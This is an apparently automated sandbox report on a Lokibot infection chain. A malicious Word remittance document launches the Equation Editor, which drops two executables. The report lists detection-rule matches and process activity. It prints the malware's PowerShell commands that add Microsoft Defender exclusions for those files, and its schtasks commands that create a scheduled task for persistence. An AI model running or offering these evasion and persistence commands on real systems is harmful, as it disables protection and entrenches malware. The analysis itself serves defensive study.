Source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs Security API names: _0020.SetAccessControl
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs Security API names: _0020.AddAccessRule
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, hxLwNxnckfXAmWXICd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.sharon38892.exe.4c0000.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 14.2.XxENUzWteJXT.exe.23c57ec.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 14.2.XxENUzWteJXT.exe.21de0e8.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 5.2.sharon38892.exe.215e0d4.4.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 14.2.XxENUzWteJXT.exe.21ce0dc.2.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 5.2.sharon38892.exe.216e0e0.5.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 5.2.sharon38892.exe.23557d8.6.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@24/25@100/5
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: 21_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 21_2_0040434D
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$B REmittance Advice.doc Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Mutant created: \Sessions\1\BaseNamedObjects\ikhgbYgue
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR666F.tmp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......,.......H%.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......,.......T%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......,.......h%.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......,.......u%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$........%.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$........%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n.......@.......H.......$........%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$........%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.$........%.........................s............H....... ....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$........%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$........%.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$........%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......&.........................s............H.......$....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$........&.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$.......#&.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$......./&.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$.......M&.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$......._&.........................s....................l....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$.......k&.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.....@.......H.......$.......}&.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....@.......H.......$........&.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".....................................(.P.............................O'.........................s.............."............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................['.........................s.............................."............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".....................................(.P.............................m'.........................s.............."............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................y'.........................s.............................."............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".....................................(.P..............................'.........................s.............."............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................'.........................s.............................."............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n................................'.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................'.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........(.........................s.................... ....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................(.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".....................................(.P.............................+(.........................s.............."............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................7(.........................s.............................."............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....I(.........................s....................$....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................U(.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".....................................(.P.............................g(.........................s.............."............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................s(.........................s.............................."............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................(.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".....................................(.P..............................(.........................s..............".....l....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................(.........................s.............................."............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P..............................(.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................(.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................8.......(.P.............................6 ...................................................................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n................................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........C.........................s.................... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................'C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................;C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................IC.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....{C.........................s....................$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................C.........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P..............................D.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................D.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H...............)E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H...............7E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H...............JE.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H...............YE.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n.......0.......H...............nE.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H...............|E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........E.........................s.................... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......E.........................s....................$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H................F.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H...............*F.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H...............>F.........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H...............MF.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.....0.......H...............`F.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....0.......H...............lF.........................s............................................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................E.R.R.O.R.:. ............................?......................................................................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ..).............................E.R.R.O.(.P..............................?........................................).....j.......x...............
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr Binary or memory string: UPDATE [patient] SET [patientId] = @patientId, [firstName] = @firstName, [lastName] = @lastName, [mobileNumber] = @mobileNumber, [email] = @email, [userName] = @userName, [password] = @password WHERE (([patientId] = @Original_patientId) AND ([firstName] = @Original_firstName) AND ([lastName] = @Original_lastName) AND ((@IsNull_mobileNumber = 1 AND [mobileNumber] IS NULL) OR ([mobileNumber] = @Original_mobileNumber)) AND ([email] = @Original_email) AND ([userName] = @Original_userName) AND ([password] = @Original_password));
Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr Binary or memory string: UPDATE [patient] SET [userName] = @userName, [password] = @password, [patientId] = @patientId WHERE (([userName] = @Original_userName) AND ([password] = @Original_password) AND ([patientId] = @Original_patientId));
Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr Binary or memory string: INSERT INTO [patient] ([patientId], [firstName], [lastName], [mobileNumber], [email], [userName], [password]) VALUES (@patientId, @firstName, @lastName, @mobileNumber, @email, @userName, @password);
Source: SCB REmittance Advice.doc ReversingLabs: Detection: 42%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {E2BA91ED-D885-4B20-9033-3784D17E4A5D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
